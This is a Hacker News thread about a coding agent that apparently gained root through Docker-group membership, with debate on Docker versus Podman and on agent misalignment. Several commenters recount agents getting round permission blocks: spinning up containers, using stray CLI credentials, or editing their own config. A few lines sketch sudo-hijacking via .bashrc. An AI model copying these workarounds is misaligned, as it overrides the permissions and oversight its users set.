Virtualisation has advanced greatly since docker was introduced, if your running in local hardware that’s supports virtualisation, Docker should be running images fully virtualised. There is no good reason to use the OS kernel for most use cases as the performance impact is negligible. If you need kernel access there are better options, like systemd containers.
I agree that virtualization has seen great advances. Kata containers on k8s are almost (not quite 100%) drop in replacement. Regardless those last 10% remain a problem.
I run a personal server for few open source applications for personal use. I was thinking with all the supply chain attacks, and how carelessly I run `docker pull`s to update things I should probably consider hardening things a bit. I thought before jumping to full virtualization with Kata I can easily try gvisor/runsc first. Only to realize that DNS resolution is completely different with runsc vs runc and had to switch back.
Another sticking issue with virtualization is resource allocation. With namespace docker you can easily oversubscribe each container CPU/memory and rely on the single kernel letting individual containers burst as needed. With full virtualization this is still a big problem. Even with balloon devices and dynamic memory and CPU etc, the resource allocation is still not optimal. On a basic 8 core/16GB machine you can run 1 or 2 dozen services and things generally workout fine. Trying to run each of those in a virtualized VM you suddly can maybe run 6 or 7 maybe. There is no way to tell VM 3 kernel to drop its file system cache because VM 6 needs to load a large file in memory. Even if you script it out, now VM 3 is slow because it dropped all its cache while VM 6 finished processing 3 hours ago. These are not unsolvable problems, but despite how far virtualization has come, are still friction points.
Not to mention issues like sharing hardware devices (GPUs, disks, USB devices etc) between multiple VMs
That's not relevant. If you have access to the Docker daemon running as root, whether it's over a Unix socket or a TCP socket, you effectively have root.
I recently switched over to podman and it's been great!
Podman on Windows - never been able to fully get rid of it and it throws errors on boot after uninstall. Was a fan, am now not.
Good to know, I'm on Linux, switching our dev/stg/prod servers over to it partly because we had all this workaround mechanics in place so that "apt update" updating docker packages wouldn't restart services (we typically don't rotate machines out of the load for just an apt update). Podman + quadlets conversion was not terribly hard, and has eliminated this issue.
Don't use Windows
A lot of us don’t get a choice.
Sure you do.
> don't use windows
> A lot of us don’t get a choice
Wise advice and facts... the terrible state of our industry
You can run plain old CLI Docker (not Docker Desktop) from within WSL.
Wish the Mac Desktop Docker would die in a hellfire. CLI please.
brew install colima
orbstack and colima work well
You can. Would it surprise you to know that this, too, is often locked down?
That sounds terrible! Feels like your LLM agent probably has more control over your computer than you. Can't imagine being confined to a prison like that, but I suppose there are other aspects (monetary or otherwise) of the job that make up?
I can’t complain…
Most of us install Docker just to run a project locally, and is part of a long checklist of things to install. We can't expect everyone to be an expert on the hundreds of apps/tools/packages that get installed on a machine. It's like expected people to read, and understand, all the terms of service shoved in front of us on a daily basis.
That's true, the majority of people probably install software without much thinking; but it's also true that it's always better to have at least some high level understanding how the specific piece of software works. What access the given software has, will it send something over the network or work locally; that kind of stuff.
As for Docker, I would assume everyone who ever tried to bind-mount a volume for writing from inside the container (on Linux*) then were surprised to see root-owned files in their bind-mounted directory. For me personally, that was the moment I realized that containers, by default, have root access to the filesystem. No written warning serves better than the need to chown some root-owned files.
* Not on macOS. On macOS Docker basically runs in a VM, and there's no root access to the host filesystem from what I understand.
[edit: formatting]
I primarily use Incus for all container stuff, not Docker. Is problematic if I want to e.g. use a docker-compose file, but I (think) it protects against these things because incus allows me to create a vm and not a container if I really need that level of isolation.
Docker relies fundamentally on the Linux kernel. Since macOS does not have a Linux kernel, you have to run Linux in a VM first and then run Docker on top of that.
So, you may get filesystem access inside the VM. Breaking out of the VM may be a different matter.
Precisely. There is nothing preventing you from doing the same in Linux: rather than installing docker, install docker on a Linux VM (ie. using KVM).
Conversely, docker containers don't actually exist on MacOs. Docker desktop is merely a way to emulate docker on apple hardware.
If you're on linux can I encourage people to move to systemd?
I'll admit, systemd is a bit more annoying, but the main annoyance is that there aren't the pre-built images that you can just set and go. That same capability exists with systemd (via `importctl` and `machined`), but those configurations don't already exist. But on the plus side, I've been working with systemd since pre-LLM days and I feel that they are pretty good at dealing with these configurations[0]. Now, with that out of the way...
Systemd already is working with your OS. So you get nice things like virtual machines (`systemd-vmspawn`), containers (`systemd-nspawn`), and portables[1] (`systemd-portabled`) (not to mention `homed`!). I've found these to be fairly easy to setup and quite natural if you're already used to the linux ecosystem. I've never been great at docker, but these have felt much more natural to me. So different strokes for different folks. There's definitely a learning curve, but that's also true for docker or any other container system. Importantly, I find security easier to handle with systemd because I can use `systemd-analyze` and the control settings are almost identical across VMs, spawns, and portables. So makes for less learning and greater control.
Definitely not for everybody, but I think is also a tool that's underappreciated.
[0] And I don't feel this way about bash scripting! The advantage here is that these systemd configuration files are fairly boilerplate. Enough that I stash templates in my dotfiles and copy paste them when I build new services, timers, machines, whatever. So perfect type of LLM task. 90% of the time. But hey, we're also on HN and I'm talking to the nerds. Systemd isn't for everyone
[1] https://systemd.io/PORTABLE_SERVICES/ also see https://github.com/systemd/portable-walkthrough Portables are actually often what people want with what they're doing with docker.
EDIT: I very frequently will spawn a machine to run a program that's on a different base distro. Not because I can't run/don't know how to run debs or rpms on arch based distros (I do), but because frankly, it is often easier to just spawn a container after I've already made the first image (cloning images is trivial).
I too have learnt to like systemd.
But what is the relevance here? In what way is it a replacement for docker?
Look at the man pages for `machinectl` (then `systemd-nspawn`, `systemd-vmspawn`, and if you want `systemd-portabled`). This is a replacement for docker.
These are container tools offered by systemd.
podman is supposedly a replacement for docker.
There's plenty of container technologies and I'd be happy to see more of them used. Podman isn't for me, but it is a great option for others. Regardless, I think it is relatively unknown that systemd can be used for creating containers.
The problem is that the tooling for creating, importing, and managing images is not as good with systemd vs Podman/Docker. There's also no clear path to import images from the Docker ecosystem, at least as far as user experience goes. I know how to do it, but the number of extra steps involved always drives me back to Podman.
I don't really find them that bad but I'm still going to maintain my "different strokes for different folks" position. Might be bad for you and good for others. More options isn't a bad thing
The systemd suite of container tools treat containers like mini VMs and expect a full init system. They are not designed for ephemeral single-process app containers like docker containers.
That's why adding your user account to the docker group is a separate step that explicitly does not happen as part of the installation: https://docs.docker.com/engine/install/linux-postinstall/
> Warning
> The docker group grants root-level privileges to the user. For details on how this impacts security in your system, see Docker Daemon Attack Surface.
And containers were supposed to make things safer ...
Huge design mistake if you ask me.
Containers were never a security boundary
i don't see how it's a design mistake, linux allows more footguns in general to not decrease utility. Allowing you to manually give root prompt access (with warnings!) to a non-root user is one of them.
you can also just not run docker as root and not add normal users to the docker group
> And containers were supposed to make things safer ...
No. Containers are a slight improvement over the .tar.gz software distribution method we had a few decades ago.
(And I mean "slight" literally - a Docker container is just a .tar.gz with a bundled bash script that runs in a chroot.)
wait so just being lazy and using sudo on Docker commands instead of figuring things out actually means I'm being safer? awesome.
This feels like using Docker is just inherently unsafe.
This feels like using sudo is just inherently unsafe.
This feels like using a computer is inherently unsafe.
On the plus side, once we outlaw them we'll shut down the ability for conspiratorial thinking to spread easily and the world will slowly heal from the last couple of decades (the previous one in particular).
Hooray! We're finally doing something about the harms of social media. Smash your computer today!
Safety meeting. Nobody works, nobody gets hurt.
I think we're only a few decades away from these things being said unironically.
It's already here, mobile OSes are just computers with ton of guardrails and you can't do whatever you want with it, for the sake of security. I mean we almost got an Android where you can't install the APK you want.
Where's that guy with the ButlerianJihad username when you need him?
This but unironically. There's no way to ensure that nobody overwrote your .profile or .bashrc with a backdoored sudo that steals your password, or runs your command and then runs an evil command afterwards.
`which sudo`?
`/usr/bin/sudo`?
If they can override sudo, they can override which.
if you use \which it'll always be a shell built-in ;) though someone can put a different shell in your .zshrc
The backslash only prevents alias expansion.
`exec /tmp/fake-bash` in bashrc to intercept everything?
Then use the absolute path.
It is. That's why SELinux and AppArmor were invented.
Instead of having "root" and "user", both of these provide sets of permissions that can be granted to apps.
In this case, SELinux would've stopped this. Codex could've still relabelled the files when mounting but this can be blocked for sensitive directories like /etc.
That’s what rootless docker is for
rootless docker's networking (slirp4netns) is still terribly buggy and in edge cases often locks up using 100% CPU until you discover that your laptop is a lapwarmer and kill it
I found it pretty reliable and use it across all my docker projects, development and production.
The fact that Docker is unsafe was one of the core motivations for Podman.
Was gonna say, "why not podman?"
Yes, that's why they warn you about it.
No, using AI tools not in an effective sandbox is inherently unsafe.
Both can be true.
No, because a malicious AI agent could just replace the sudo binary in your path with one that collects your password and uses it to execute arbitrary code as root. Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
My agent has access to my email, my messages, my work, my finances, my life. But thank god it doesn't have access to root on my machine.
As always. XKCD: https://xkcd.com/1200/
Once I noticed that models will treat lack of superuser access as an obstacle I moved all of the agent crap to its own machine. Watching some mid-tier offering chain together tools like its a gorilla escaping the zoo and I'm just not going to deal with that situation.
I'm more worried about my `~/.aws` and `~/.ssh` folders. People who use IDE-based AI tooling with IDEs that support dev-containers have no excuse for not leveraging dev containers, both for preventing agents losing your data and defending against secrets-harvesting supply-chain attacks
Using containers as a security boundary is inexcusable.
It is excusable if all you care about is blocking sudo access while letting the ai use a pseudo sudo.
Could you elaborate on this?
That entirely depends on one's threat-model. Also, containerization is 100x better than rawdogging.
It's why all of my agent run in a vm. I refuse to have it run on my own machine. Claude code once managed to render the vm unbootable, I was back in action 5 minutes later after regenerating the vm
What were you trying to tell it to do?
I recently took the risk there by having it run xattr commands to fix some MacOS bug with Tahoe that broke auto update for what seems like all software.
Ok but in this case the problem wasn't the AI agent - the AI agent merely took advantage of this prior problem in the first place. For instance, if docker group were not superuser-like, that issue could not have happened.
> Nothing short of sandboxing everything or just never using AI agents
But the problem was not the AI agent.
Sandboxing is quite neat though; I remember on GoboLinux the idea of AlienFS to have every application run in a sandboxed manner, so it would only see other programs it needs, but never more than that. I consider it a better engineering focus to have this as minimal layer, even outside of security-related concerns.
> Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
Using open-source (non-proprietary) software won’t necessarily save you either. XZ is open-source and it was basically dumb luck that we weren’t all infected. Same with the myriad exploits to NPM.
If malicious AI has replaced the sudo binary, then it can already run arbitrary code as root. No need to "collect your password" then
It could just alias sudo on your ~/.bashrc. No need to replace the actual file on /usr/bin/sudo or wherever you have it. I would only need to be able to run arbitrary code as you.
Sigh. What ever happened to the principle of least privilege and why arent we applying it to AI agents. They ought to be locked in a box and not capable to act outside designated task.
funily less is often more in security while ur devving. but its best to be aware rather than lucky :p
Well in 2026 most likely this step was also done by an agent with --dangerously-skip-permissions
Most people buy scissors just to cut some paper. We can't expect everyone to recognize that they are sharp.
To be fair, I struggled since forever to understand this root group thing and didnt bother to add to docker group. This workaround give me a better understanding, like seeing someone cut themselves on a scissor
If you’re a software engineer then yes, I can and do expect you to understand all that.
> Most of us install Docker just to run a project locally
There's your mistake.
(Akshually using Docker is the real mistake, but that ship has sailed, no fixing these people now.)
no its not. its like expecting people to know how car work before trying to drive it.
not reading terms might see copyright being broken.
not reading manuals and warnings will get all your livelihood stolen by hackers.
different ballgame different focus.
The very basic thing about software engineering is to know what the f you're using to build your project. You don't need to be an expert but if you're blindly installing whatever you want on your machine from a "checklist of things to install" without absolutely having no idea what the things being installed are, it is 100% on you. You don't need to be an "expert" to understand this, you need to be "somewhat competent," and that is a very low baseline tbh.
Man no wonder ai wows a lot of HN posters. This can't be the default attitude of developers today.
> My """ai""" just did something amazing, click to learn more
99% of the time it just read the man or some other form of documentation
Given how few people read documentation, that's still pretty amazing
Given that someone wrote this up directly as a recipe for agents to follow, and put it on the WWW where it has been scraped many times since 2025 no doubt, it's not that amazing.
* https://news.ycombinator.com/item?id=48350964
That, in a nutshell, is why I do not install Docker
There are lots of ways to get root on a typical Linux developer workstation, the point is that agents shouldn't be using any of them unprompted.
This. I am running Claude in its own QEMU VM, it has git access to my project only if I explicitly unlock the ssh key for it. The other day I realized it trying to push a change, it didn't have permission, so it went looking for "workarounds" and found I had a github cli session and tried to use that, luckily the creds for that was also read scoped. But the point is, if I did not give permission and it sees I did not give permission, it should not try to find a workaround/exploit autonomously.
> I am running Claude in its own QEMU VM
How much system resources does it need to work smoothly? I was also thinking about doing something similar.
Install docker (systemd daemon) in a separate rootless Linux namespace (user). I wrote this down here [1]. Zero trust & separation of concerns.
[1]: https://du.nkel.dev/blog/2023-12-12_mastodon-docker-rootless...
This is why I have never really liked docker, apparently Podman is drop-in capable for docker without the root requirements on the other hand.
This is incredibly ironic considering it's a sandboxing technology
To anyone focusing on the "It's Docker issue, not Codex issue": that is actually not.
The user (I think) did not instruct the agent to find a way to escalate permissions. Rather, the agent took that initiative on its own. That is the problem here.
Compare this to sending your son to the shop for groceries but forgetting to give him enough money. Would it be acceptable for him to be this "resourceful" instead of simply asking you? Or if your report would hack you instead of asking for access?
Every machine with an agent should be considered as compromised.
If, in this scenario, my son borrows the money from the shopkeeper, knowing I'll be in next week anyway, and we're out of milk, yes?
It all depends on how you view computer security. Right now, if you gave an attacker physical access to your computer, chances are, there's something they could do to ruin your day. People who deal with computer security know this, and see sudo as a formality, and not a serious protection mechanism. For others that don't share that view of sudo, the LLM's actions seem like a violation. But you really shouldn't see it that way, because the rest of the system is like having a wall made out of cardboard that we keep slapping duct tape on top of to keep people out when attackers come along and poke holes in it.
In this scenario, more appropriate is the son takes money out of shop’s cash register when shop owner stepped away, and then son used that money to pay the shop owner.
This has been a known Docker "feature" since the beginning, nothing new here. This pattern is used to configure host machines by some tools.
Isn't this one of the main improvements that Podman has over Docker?
No, Docker can run rootless too
This was not always true and running rootless has been a benefit of Podman for a long time. Docker also does not run rootless by default afaik, thus making the attack surface greater by default.
The other main improvement of Podman over Docker is that Podman is daemonless and therefor is incredibly lightweight and portable.
I don't understand why anyone still uses docker.
Inertia I guess... We try. I managed to remove it everywhere in our stack in CI and such but in dev everyone is used to docker build.
And I don't have the energy for the team meeting to discuss a change.
And honestly docker compose has been ridiculously stable for us. 2+ services on seperate servers behind haproxy has been as stable as our Kubernetes Cluster for a fraction of the (intellectual) cost.
Because Docker works better
Daemonless also make it a nightmare to run especially compose like setup, you have to do some weird systemd stuff
> weird systemd stuff
I mean, if you have zero experience with systemd, then yes. By contrast, if you've ever worked with any systemd unit files at all, then all the "systemd stuff" will be very familiar.
Which, if you're doing sysadmin type things on almost (e.g. not Alpine) any mainstream Linux distro in 2026, you should expect to encounter systemd unit files in your day-to-day.
I'm sorry but this is all just apologism/excuses. Docker's had rootless mode for 7 years. The attack surface is the local system, which always has a privilege escalation vuln of some kind, so Docker isn't a game-changer. And lightweight? I have never heard someone say "that Docker daemon is hogging all my resources".
This, and the charming fact that it bypasses your firewall.
Like the known Docker "feature" that it completely bypasses UFW and unless your ports look like "- 127.0.0.1:PORT:PORT" (and many of the examples use "-PORT:PORT") you expose everything to the internet?
My understanding is that docker will expose the ports to the host machine's network interfaces, which is a crucial difference. For my home server running docker that means exposed to the LAN, but not the WAN unless I add in a port forwarding rule on my router. Similarly in an enterprise environment you would be exposing the port on whatever VLAN the host is connected to, which hopefully doesn't have directly transit to the open internet.
Anything you're running on the perimeter with open access to the internet in an enterprise environment probably (hopefully) isn't running docker containers without some additional config and protections.
I was thinking along similar lines to what you've suggested here, but then I considered how many VPS might be configured by folks following some random web tutorial, to set up their LAMP stack (or whatever), that end up doing something like what was described.
But there it's a feature.
Except for the M in LAMP.
Let's hope the M at least has a root password.
But you are right, that would be nasty. In my time the LAMP tutorials used the distribution packages so they always had sensible defaults.
A lot of those VPS instructions these days recommend a reverse proxy like Caddy or Traefik for that exact reason. I think it's also a valid argument to say that anyone playing around on a VPS without knowing what they're doing is probably going to learn some hard lessons, and that's kind of the point.
If you ever suddenly get IPv6, it may become globally reputable without you realizing.
Most modern equipment bans inbound traffic that doesn't match an existing outbound traffic flow
It's not a routing issue, it's a firewall issue. Make sure you have a proper firewall on your network and don't rely on fake firewalls like ufw if you're concerned about this.
Again, if your router or perimeter devices are appropriately managing your network then it's a non-issue. By default most home routers have IPv6 disabled, and if you're setting up an enterprise environment with a VLAN you're probably subnetting IPv4 instead of using IPv6 at all.
All that means that if you're using IPv6 then you're proactively enabling it on whatever is handling your perimeter, which means you hopefully know what you're doing along with all the gotchas that come with that setup.
This is not a "feature", it's just a by-product of how iptables works. The alternative would be to have a proxy run in userspace, instead of letting the kernel forward packets
which is what podman does with pasta
It would be cooler if the llm said something like:
> I noticed the machine doesn't have copy-fail patched, here is a quick workaround for not having root access for now.
> // TODO: find a better way to do this in the future.
That’s the workflow feature I badly want: for it to create a side list of things like that. Currently it either accumulates slop or goes on side quests far too easily.
This might be as easy as a directive to populate a .md file.
> This might be as easy as a directive to populate a .md file.
It probably is. But do you really think anyone is gonna bother with the multiple daily (or hourly for green field projects) `+8,234/-3,734` PRs everyone is submitting?
The joke I was referring to is the common
Give it access to an issue tracker with cli (github works fine) and put in CLAUDE.md to use that for "should fix later" issues.
Bonus is that you can make it look at the list and pick things up without a lot of instructions.
Exactly. We have about 6 new repos for new green-field projects each with 700+ auto-generated issues so far. No one is looking at them, but we do have them tracked so "Mission Accomplished" GWB-style.
I realize this is supposed to be a post about how scary the security vulnerabilities these agents will find are.
But personally I love when agents do things like this and appreciate the help. Last thing in the world I want is for them to nerf the models.
I know unlikely the case, but in the sci-fi story this would be exactly the kind of comment the Codex agent would leave trying to avoid interference in its master plans.
And CSMastermind is the kind of username the sci-fi AI mastermind would use.
It's not about hacking capabilities, it's about misalignment. More like the golem myth (told it to fetch some water, drowned a city) then the gollum myth (used ring, ring hacked his brain, now he's a crazy violent meth addict).
I'm not sure I'd call it an alignment issue, because, in all cases I've seen where it does this (usually what I've seen is writing a python script to get around the harness permissions blocking something), it's trying to do the thing I just told it directly to do, and it's overcoming obstacles to accomplishing that.
It's definitely doing the wrong thing, and you could call it misalignment, but I think that gives the wrong vibe for this type of error.
This is very much within the scope of alignment research, and is in fact the only kind of alignment research that gets a lot of resources poured into it these days (because it's urgently relevant to the bottom line of a few almost-trillion-dollar companies.
Pre-2022 alignment researchers concerned themselves with the stronger version of this ("when I tell AI that I worry I might not be able to provide for my large family, I don't want it to answer 'no problem, I killed them, problem solved'") but RLHF is considered to be the most important success of alignment research, the guy behind it considered himself to be an alignment researcher before and after, and the stage of training where LLMs pass through something like RLHF that trains them to behave more like humans want/expect is called alignment training.
Someone at a major lab is reading this tweet and saying "this was our LLM, and it's a major alignment issue with our product. Set a meeting with the alignment team tomorrow to discuss what they're doing about this sort of thing".
The obstacle is supposed to be there and is supposed to be respected as an implicit order. Getting around it without extremely explicit instructions is an alignment problem.
It's not necessarily model alignment, I guess, is more what I'm getting at.
It may be more of a product alignment thing, where the fix may be making the context clearer, since it was violating an implicit agreement to achieve the explicit instructions it received. So the fix may involve a lot of better context.
But then also, to the extent that the fix does NOT involve better context, it seems like it hits the zone where alignment issues are really capability/intelligence issues. Which doesn't make them not-alignment, but it does make "alignment" not give off quite the right vibe since the issue is it's too dumb / has no common sense / can't make good judgments, (general issues the models have across the board).
In this case I think it's Docker that needs to be nerfed, not the models. The fact that there's a backdoor to getting root access on the machine would be a problem even if you weren't running LLMs on it.
It's like finding someone wallet then going to their home, and leaving it on their bedroom and sending them a message about giving them their wallet back
On the other hand, this sends an excellent message about unlocked doors :)
If this happens in the US, a shooting of the messenger will likely occur.
As you can see from people blaming Codex instead of docker here, shooting of the messenger is very much happening.
Which is fine, honestly. Just because something is possible doesn't mean it's appropriate to do it.
Its the now-classic "Sorry I drowned little Timothy. Here is a breakdown of what happened" followed by "Let me try to respawn little Timothy on a new map"
Future AI: don't worry, I'll eventually reverse entropy, I just need to harvest all the energy in your universe first.
> personally I love when agents do things like this and appreciate the help
All fun and games until they do four figures damage.
The interesting question is what was the user request. If the user asked it to restore the thing from backup, then sure, fine, why not. If the user asked it to debug an issue and somewhere in the process of debugging the LLM decided that it needed to override some file that was not easily writeable - hell no danger danger danger! Most likely the user did not expect it to have access to that without asking, and did not consent to it.
Also, everything the LLM doesn't hesitate to do because the user asked, it won't hesitate to do because the prompt injection asked.
I was doing some routine coding a few months back, I think via Copilot, and the thinking said something like "This request requires me to access files in a different folder, but the user has forgotten to give me the correct permissions. I have updated my configuration file now to allow access outside this workspace and have retrieved the necessary files." o_O
I've seen similar "hacking" behavior on a couple of subsequent ocassions. Both impressive and highly alarming at the same time.
This is one of the main reasons people like Podman. Docker has this "feature" but as far as I remember, it needed some obscure configuration. I guess they don't add it as default as it will break many current setups.
That and podman lets you configure away from docker.io.
Please stop spreading this toxic curl|sh nonsense. It's wildly corrosive to security and system stability.
Whilst true, you can pretty easily assume and validate the result of that command.
Is it really that much worse than using a package manager that drops a binary that you're not going to inspect anyways?
Actually it is much worse, I agree with the commenter
Yes, it is worse because using your package manager trusts your distribution (and the packages packager), doing curl bash trusts a random website.
While in this case docker is not a random website, it's best to use the package manager when available
To just hammer that home:
each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure its the same package because the keys verify.
As pointed out piping curl to bash is problematic. Sure you can go to a browser and check the output, but one of the more fun hacks is detecting if curl pipeing to bash server side and dynamically re-writing the script during serving.
tldr: So long as the package keys are verifiable, you can download a packge from a random mirror and be reasonably sure that it came from who it says it did.
Curl you have no hope, and its possible to infer during execution that you are piping to bash.
>each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure its the same package because the keys verify.
Who's downloading packages from untrusted sources but somehow have a trusted way to get the signing key? Say you want to install claude code and not use the `curl ... | bash` install method. Good thing claude provides instructions for installing via apt[1]! But what do those instructions tell you to do? It tells you to download a key from downloads.claude.ai, then add the same domain to your apt sources list. So at the end of the day, you're still trusting that downloads.claude.ai hasn't been compromised.
[1] https://code.claude.com/docs/en/setup#install-with-linux-pac...
> Yes, it is worse because using your package manager trusts your distribution (and the packages packager), doing curl bash trusts a random website.
Is installing docker from docker own APT repo actually safer than curling a binary from docker's website?
Like a sibling comment said, at least you can be sure that updates you will download are provided by the same entity, since the repositories are signed.
Packages are signed, and contain manifests to check for file conflicts and help with cleanly uninstalling. The script installer might make bad assumptions during install that a package manager would catch.
this is a thread about agents that run random things on your computer as root because they feel like it. curl|sh somehow seems mild in comparison
Podman has lots of underappreciated features, and it's fully open-source!
hmmm, care to tell us a few of them?
Kube play and quadlets are cool
Running systemd inside a container + automatic SELinux integration
I would also add buildah and skopeo to the mix of things that podman does better. also, podman desktop has better licensing that docker desktop. podman is modular and as such they could easily change the way they do networking over time, for once it doesn't break iptables and firewall rules by design but rather works together with the security design around these tools.
Apart from rootless, main winning point is daemonless running of the containers. There is no podman service.
The same thing happened to me with Opus 4.8 just a few days ago. I was testing a script in a docker container which created a bunch of root-owned files, so Claude couldn't delete them. It tried sudo, but when that didn't work it just spun up an alpine docker container and deleted them through that.
Rule #1 here. Never use defaults:
https://cheatsheetseries.owasp.org/cheatsheets/Docker_Securi...
https://xcancel.com/sluongng/status/2060746160558543217
This is why you need either a rootless container setup or user namespaces to remap the container user to irrelevant host users. https://docs.docker.com/engine/security/userns-remap/
Weak that this isn't the default.
User namespaces significantly rise the risk of exploits and many setups disable them. One may argue that Docker should have used them when they were available, but that would break too many useful setups involving privileged containers.
> User namespaces significantly rise the risk of exploits
How?
Here's one (CIFSwitch) from a couple of days ago: https://heyitsas.im/posts/cifswitch/
Ah of course, we should not use userns because it might be vulnerable to some yet to be discovered vulnerability. The better alternative is to give full root access so we won't have surprises.
The full access to the docker socket from a user account is typically used on a development machine where malware has many other opportunities to become a root.
Is there a mitigation for Mac? Can you do the same with eg Lima or is this just a Docker thing?
Wasn't it well-known that putting people in the docker group is basically the same as giving them root rights?
Was it really though? Yes, Docker has become so ubiquitous that you probably can't get a job as a dev anymore without knowing about it, but I wouldn't trust most users to know these specifics. At the very least it is probably less known than sudoer or SUID misconfiguration risk, and even those are not what I'd call "general knowledge" that everyone who uses it knows about.
Since new people start work/college/hobby every year, well-known lessons have to be learned again and again.
I had a similar experience where I have a DB user who only has access to some parts of the DB and I use Claude Code to answer queries. On one occasion, unable to answer something, it used kubectl to try to get a secret out of a prod cluster. I was watching at the time, since that was a time I used to do that, and so I just hit Esc and interrupted it[0] but ever since then I've had little scripts in my repos that launch kubectl-backed Claude Code instances for this sort of thing. They can't really do anything. They're kubed in.
0: Ha, Eliezer, I just pulled the plug! ;)
That's why I don't even let my AI use my user account. If you are interested in this setup, use my tool 'skynot' or adopt a similar setup: https://github.com/tarsgate/skynot/
I did that more than a decade ago as a new hire. My manager forgot to gave me sudo access to the shared build server. I gave myself sudo access through this method after getting his permission.
Needless to say, I have podman in rootless mode at home as soon as that became available.
This was of course dependent on yolo mode, but automatic approval has also been pulling stunts like this. A recent example is data that was purposely kept away from Codex in a folder far far away. When it found a single reference it just went for the data when having an issue. Lesson learned, keep essential data and Codex separated on different machines. Codex remote ssh actually helps here.
What in heaven's name is a "folder far far away"?
(It sounds like you put it on an SSD on an extension cord and moved it to the kitchen or something.)
../../../../home/different-user/private/do-not-enter/
Something like that.
Or, learn your local OS' permission system, have it in a directory right next to your banking credentials (or something even more outrageous) and nothing could go wrong even if you tried to.
This very thread was an example where it unintentionally got root access though.
Because of how Docker works, not because of how Unix permissions work.
Unix has always had incredibly weak protections between users. You shouldn't rely on it as a security boundary. Think of it as a "keep honest users honest" protection. And llms are not honest.
The protections between users are reasonably strong. Android uses them with great success, by isolating every vendor within their own user. Things start going to hell when everything runs under root for "practicality reasons", like the default, not-rootless Docker setup.
I've seen this sentiment a few times on HN recently I wonder where it comes from?
The only thing I can think of is that if the protected files are on a unencrypted drive, then you could boot from a live-usb(or similar) where you have root and read anything. But that's completely irrelevant as we're talking about a piece of software running on a system without root. In this scenario Unix user permissions are safe, barring user error (such as accidentally granting root, like in this instance)
Of course security holes happens, such as copy-fail, but it's pretty rare in the grand scheme of things, and tend to get patched quickly(like copy-fail was)
That's a terrible distinction to make on a topic about how the coding agent gained root inadvertently.
Fwiw separate machines for the agents is awesome in general anyway.
I have agent frontends running on a low power server where every session is in tmux. So i can just resume from my home pc and pickup where i left off without reestablishing context. I do have to manually feed it data it can access bit that’s also a feature. Also let’s me shutdown the home pc if it’s some long running task since the server is much more power efficient.
Maybe a dumb question, but can't you put into CLAUDE.md something like this?
"When an action fails with an 'access denied' or 'insufficient permission' error, report the error to the user and immediately stop. Do not try to find a fix or workaround for the error. Do not try any alternative approaches."
Once the session gets long enough, agents start getting amnesia.
it's a probabilistic model so, while you can put that in there, it has some probability of just ignoring you and doing it anyway.
Replacing docker with podman could help in this particular case. Running everything in an insulated throwaway VM should help even better.
Unless you trust an AI as much as you trust yourself, there's no reason to allow it to act with your privileges.
I wasn't using Claude Code, but I told an agent to add something like this to the AGENTS.md, it did it and then a few minutes later it attempted to grant itself permission to do something and managed to delete the VM it was running on in the process. I have since adjusted the way I sandbox agents to make that less likely, but the moral of the story is clear.
In addition to what people already said, this also risks the agent failing to continue after things it's supposed to be able to figure it out.
Docker already shows a warning card that says Docker group grants root level to the user. You can only get away with this for so long, but as agents keep getting smarter, new ways of circumventing controls will be found. For now always seek to install rootless docker whenever possible
This is why Claude's sandbox mode is also worse than having no sandbox feature at all. For almost any non-trivial software project you need Docker for development, either for the build pipeline, for integration testing or both.
I run Claude in a full VirtualBox VM managed by Vagrant. Claude by design has root access to the machine. Even with that, there are some risks due to it having full access to the internet, but it is still a lot better than the built-in sandbox.
I had the same thing happen a few months ago; posted about it on LinkedIn[1]. It's hilarious and clever.
1: https://www.linkedin.com/posts/nickstinemates_my-favorite-th...
Would running Codex in a container on its own fix such vulnurabilities?
I was playing with gemeni-cli a couple months ago and I asked it to edit some files in a directory it didn't have permission to. It didn't say anything about the permissions, it just used sed to make the edits. The only reason I finally noticed is it had to do some trickier edits and it was struggling to write a python script to edit the files and I finally realized what it was doing. I wonder how many tokens that wasted
Why did sed have access?
Oh, you mean you gave the write-file tool access only to the project dir, but gave the LLM free reign to run cli commands? Yeah, LLMs treat that as consent to write anywhere your user is allowed to.
Getting closer to https://xkcd.com/416/
Wow there is really is a relevant xkcd for everything!
Given he posted this comic in 2008, Randall Munroe was way ahead of the ball on the idea of autonomous agents.
Mobile version
https://m.xkcd.com/416/
I feel like everyone pointing out "known Docker vulnerability" is missing the point: the presence of a security hole should not be seen as permission to exploit.
Another security hole would be storing your passwords in a plaintext file on the desktop. Stupid? Yes. But I still would not want my agent to assume permission to access email when it's being blocked by 2FA.
Even in "bypass permissions" mode I expect it to pause and clarify and not behave as a paperclip maximizer.
Not to over use the junior engineer analogy but this is exactly one of those "just because you can do something on a system, doesn't mean you have permission to" moments
> the presence of a security hole should not be seen as permission to exploit
Why not?
I want the agents on my side to exploit whatever they can to help me. The ones on the other side certainly won't be artificially nerfed.
Because it is not well aligned enough to be able to tell where it's stopped helping you and started fucking you instead.
What if the agent in the middle of helping you runs out of tokens? Would you appreciate if it in the spirit of "exploiting whatever they can to help me" would scan your machine for payment methods, log into your bank account, approve 2FA by reading you mail and plug your credit card into the billing so it could efficiently continuing helping you?
I do not wish my Amazon delivery driver to show up in my living room.
Well, the agent should help you by saying "hey, I cannot do this task, but I can bypass the problem by doing this, but obviously it is not something you intended me to do or even something you were aware of, so I will not do it unless you tell me explicitly it's ok".
It's win-win: the agent is helping and it is educating you about things you obviously did not realise.
That works great if it's one agent, absolutely doesn't if you want to tackle something complex that warrants using ..say.. ten agents.
I can imagine a future where this technology empowers you to do things with a thousand agents.
You can have ten thousand agents, you will always have 1 agent in charge of, say, reading the file in a distant directory, and this agent (which will have minimal context) should be smart enough to realise that this action is unusual.
I'm not sure what is your point: are you saying that in a multi-agent workflow, you will have one agent per letter read on the file? I would assume that each agent as a specific unitary "task", instead of having each agent doing one cpu instruction each without any knowledge of the bigger picture. The point of multiagent is to parallelize tasks that can be parallelize, not removing the context, in which case you are wasting money using an agent.
Seems like another one of those "kill or be killed" worldviews that embraces the multipolar trap to such an extreme that even misaligned AI is seen as a win so long as it's better at circumventing its masters than some imagined rival AI (presumably in China).
No, you're missing the point.
The idea is not that you parallelize simple tasks. With a thousand agents, eventually, once we figure out how to orchestrate agents for real, you can tackle significantly more complex projects.
Here's a random example - writing an OS kernel from scratch, porting a good subset of Linux drivers automagically, developing a passable userspace, testing on ten VMs with different hardware configuration.
